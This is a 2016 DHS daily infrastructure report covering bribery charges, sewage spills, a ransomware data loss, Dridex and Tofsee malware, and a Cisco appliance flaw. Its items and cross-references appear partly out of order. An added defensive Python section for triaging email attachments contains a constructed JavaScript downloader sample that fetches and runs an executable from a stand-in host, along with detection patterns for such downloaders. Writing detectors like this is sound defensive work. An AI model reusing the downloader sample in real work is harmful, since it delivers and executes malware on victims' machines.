Complete DHS Report for October 03, 2016
Daily Report
Top Stories
• Och-Ziff Capital Management Group agreed to pay $200 million
September 29 to settle charges that the firm’s executives used intermediaries
and business partners to pay bribes to high-level government officials in
Africa in order to secure mining rights. – U.S. Securities and Exchange
Commission See item 4 below in
the Financial Services Sector
• The Baltimore City Department of Public Works reported September
29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones
Falls following severe rainstorms in the area that began September 28. – WBFF
45 Baltimore
18. September 29, WBFF 45 Baltimore – (Maryland) At least 10,000 gallons of
sewage, rainwater released into Jones Falls: DPW. The Baltimore City
Department of Public Works reported September 29 that more than 10,000 gallons
of sewage and rainwater flowed into the Jones Falls following severe rainstorms
in the area that began September 28. City officials advised the public to avoid
contact with urban streams. Source: http://foxbaltimore.com/news/local/at-least-10000-gallons-of-sewer-water-released-into-jones-falls-dpw
• The Texas Water Development Board awarded a $5.4 million loan to
the City of Edinburg, Texas September 22 to complete the expansion of the
city’s West Water Treatment Plant. – Edinburg Review
19. September 29, Edinburg Review – (Texas) Edinburg awarded $5.4 million to finish water
treatment plant upgrade. The Texas Water Development Board awarded a $5.4
million loan to the City of Edinburg, Texas September 22 through the agency’s
Drinking Water State Revolving Fund to complete the expansion of the city’s
West Water Treatment Plant. The expansion includes adding 2 raw water pumps, 2
contact reactor clarifiers, and a 2 million gallon ground storage tank, among
other improvements. Source: http://www.edinburgreview.com/news/20160929/edinburg-awarded-54-million-to-finish-water-treatment-plant-upgrade
• The Marin Healthcare District and Prima Medical Foundation
announced September 28 that the medical data of more than 5,000 patients was
lost due to a glitch in Marin Medical Practice Concepts’ system following a
July ransomware attack. – Marin Independent Journal
20. September 30, Marin Independent Journal – (California) Marin patients’
medical data lost after cyber attack. The Marin Healthcare District and
Prima Medical Foundation announced September 28 they are notifying more than
5,000 patients that their medical data, including limited clinical history,
vital signs, and documentation of physical examinations, among other
information, was lost due to a glitch in Marin Medical Practice Concepts’
system following a ransomware attack in July. Officials stated patients’
personal, financial, and health information was not accessed, viewed, or
transferred. Source: http://www.marinij.com/article/NO/20160929/NEWS/160929766
Financial Services Sector
4. September 29, U.S. Securities and Exchange Commission – (International) Och-Ziff
executives also settle charges. The U.S. Securities and Exchange Commission
(SEC) announced September 29 that Och-Ziff Capital Management Group agreed to
pay roughly $200 million to settle charges that the firm’s executives ignored
red flags and corruption risks and, in violation of the Foreign Corrupt
Practices Act (FCPA), used intermediaries, agents, and business partners to
pay bribes to high-level government officials in 5 African countries in order
to secure mining rights and corruptly influence those officials. SEC officials
stated that Och-Ziff falsely recorded the bribe payments in its books and
failed to maintain internal controls adequate to detect or prevent the bribes.
Source: https://www.sec.gov/news/pressrelease/2016-203.html
5. September 29, SecurityWeek – (International) Dridex banking trojan adopts improved
encryption. MalwareTech security researchers discovered that the Dridex banking
trojan is now being delivered in password-protected Rich Text Format (RTF)
attachments; because automated systems cannot open the file, they cannot scan
the attachment for malicious code, and the lure escapes detection. Researchers
also found that Dridex delays its execution and may be focused on infecting
corporate systems.
6. September 28, U.S. Department of Justice – (International) Dual
Jamaican-U.S. citizen pleads guilty in connection with Jamaica-based lottery
fraud scheme. A dual Jamaican and U.S. citizen pleaded guilty September 28
for her role in a Jamaica-based lottery fraud scheme in which she persuaded
U.S. citizens to send her hundreds of thousands of dollars to cover fictitious
fees on lottery winnings that the victims had not won and never received,
causing U.S. citizens tens of millions of dollars in losses from 2011 to 2012.
The charges state the dual citizen used some of the funds for personal
expenses. Source:
https://www.justice.gov/opa/pr/dual-jamaican-us-citizen-pleads-guilty-connection-jamaica-based-lottery-fraud-scheme
Information Technology Sector
23. September 30, SecurityWeek – (International) Tofsee malware distribution switched from
exploit kit to spam. Security researchers from Cisco Talos reported that
attackers stopped distributing the Tofsee malware via the RIG exploit kit
(EK) and began delivering it through spam email campaigns. The messages
instruct recipients to download and open an attached ZIP archive that contains
an obfuscated JavaScript file; the script acts as a WScript downloader and
runs an executable fetched from a remote server controlled by the attacker.
Researchers stated the malware allows hackers to conduct cryptocurrency
mining, carry out distributed denial-of-service (DDoS) attacks, and send spam,
among other malicious actions.
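The two delivery tricks in items 5 and 23 above (a password-protected attachment that the scanner cannot open, and a ZIP-wrapped, obfuscated JavaScript that acts as a WScript downloader) can both be caught at the mail gateway before anyone opens the attachment. The Python below is an added example written for this page; it is not code from Cisco Talos, MalwareTech, SecurityWeek, or the DHS report, and the sample archives, member names, and script are constructed here (not real Tofsee or Dridex artifacts). It triages a ZIP attachment: a member whose ZIP header carries the encryption flag is reported as unscannable and quarantined, and a script member is lightly de-obfuscated (String.fromCharCode and split string literals) and matched against the object names a Windows Script Host downloader needs in order to fetch, save, and execute a payload. Detecting an encrypted Office document (the password-protected documents item 5 describes) would need an OLE parser and is not covered; an encrypted ZIP member is the case a generic gateway can spot without format-specific parsing.

```python
import io
import re
import struct
import zipfile

SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta")

# What a WScript downloader needs: an HTTP client, a way to write bytes to disk,
# a shell object, an execute call, and a drop path. Obfuscation can hide them.
DOWNLOADER_INDICATORS = {
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write": re.compile(r"ADODB\.Stream", re.I),
    "shell_object": re.compile(r"WScript\.Shell|Shell\.Application", re.I),
    "exec_call": re.compile(r"\.(?:Run|ShellExecute)\s*\(", re.I),
    "temp_path": re.compile(r"%TEMP%|ExpandEnvironmentStrings", re.I),
}

# Verdict precedence when one archive produces several findings.
PRIORITY = {"clean": 0, "sandbox": 1, "quarantine": 2, "block": 3}


def normalize_script(text):
    """Undo two cheap obfuscations before matching: String.fromCharCode(...)
    with numeric arguments, and string literals split by '+' ("WScr" + "ipt")."""
    text = re.sub(
        r"String\.fromCharCode\(([\d,\s]+)\)",
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",")) + '"',
        text,
    )
    text = re.sub(r'"\s*\+\s*"', "", text)
    text = re.sub(r"'\s*\+\s*'", "", text)
    return text


def script_indicators(text):
    """Sorted names of the downloader indicators present after normalization."""
    text = normalize_script(text)
    return sorted(name for name, rx in DOWNLOADER_INDICATORS.items() if rx.search(text))


def triage_zip_attachment(data):
    """Return (verdict, findings) for one ZIP attachment. 'quarantine': a member
    is password protected, so its content cannot be inspected here; 'block': a
    script member shows two or more downloader indicators; 'sandbox': any other
    script, or an archive that does not parse; 'clean': nothing of note."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return "sandbox", ["attachment is not a valid ZIP archive"]
    verdicts, findings = ["clean"], []
    for info in zf.infolist():
        name = info.filename
        if info.flag_bits & 0x1:  # general-purpose bit 0: member is encrypted
            findings.append(f"{name}: password-protected member, content not scannable")
            verdicts.append("quarantine")
            continue
        if name.lower().endswith(SCRIPT_EXTENSIONS):
            hits = script_indicators(zf.read(info).decode("latin-1"))
            findings.append(f"{name}: script member, indicators {hits}")
            verdicts.append("block" if len(hits) >= 2 else "sandbox")
    return max(verdicts, key=PRIORITY.get), findings


# Constructed sample: a Tofsee-style lure script (hypothetical, not real malware).
SAMPLE_JS = r'''
var h = new ActiveXObject("MSX" + "ML2.XM" + "LHTTP");
var s = new ActiveXObject(String.fromCharCode(65,68,79,68,66,46,83,116,114,101,97,109));
var w = new ActiveXObject("WScr" + "ipt.Sh" + "ell");
var p = w.ExpandEnvironmentStrings("%TEMP%") + "\\upd.exe";
h.open("GET", "http://payload.invalid/upd.exe", false); h.send();
s.Open(); s.Type = 1; s.Write(h.responseBody); s.SaveToFile(p, 2); s.Close();
w.Run(p, 0, false);
'''


def build_zip(members):
    """In-memory ZIP (stored, uncompressed) from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


def mark_encrypted(zip_bytes):
    """Set the 'encrypted' flag in every local file header (flags at offset 6)
    and central directory header (offset 8) so the archive presents as password
    protected. Test fixture only: the member data is not actually encrypted."""
    buf = bytearray(zip_bytes)
    for sig, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", buf, pos + flag_offset)
            struct.pack_into("<H", buf, pos + flag_offset, flags | 0x1)
            pos = buf.find(sig, pos + len(sig))
    return bytes(buf)


TOFSEE_STYLE_ZIP = build_zip({"Invoice_2016-09-30.js": SAMPLE_JS.encode()})
DRIDEX_STYLE_ZIP = mark_encrypted(build_zip({"Scan_0093.rtf": b"{\\rtf1 placeholder}"}))
BENIGN_ZIP = build_zip({"report.txt": b"quarterly numbers"})

if __name__ == "__main__":
    for label, blob in (("tofsee-style", TOFSEE_STYLE_ZIP), ("dridex-style", DRIDEX_STYLE_ZIP),
                        ("benign", BENIGN_ZIP)):
        print(label, triage_zip_attachment(blob))
```

Two or more indicators in one script is a strong signal and is blocked outright; a script with one or none goes to a sandbox rather than being passed through, because the indicator list is easy to defeat with heavier obfuscation than the two forms normalized here. The quarantine verdict for an encrypted member is the point of item 5: the gateway cannot judge the content, so the decision has to be made on that fact alone rather than on a clean scan result that was never possible.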
For another story, see item 2 below from the Critical Manufacturing Sector
2. September 30, SecurityWeek – (International) Cisco forgets to remove testing interface
from security appliance. Cisco inadvertently introduced a critical
vulnerability into both its physical and virtual Email Security Appliances (ESA)
running IronPort AsyncOS software: an internal testing and debugging interface
was left enabled, and a remote attacker who connects to it without
authorization can gain control of the affected device with root privileges.
Cisco advised users to reboot their devices with the reboot command from the
command-line interface in order to disable the internal testing and debugging
interface. Source: http://www.securityweek.com/cisco-forgets-remove-testing-interface-security-appliance
Communications Sector
See item 2 above in the Information Technology Sector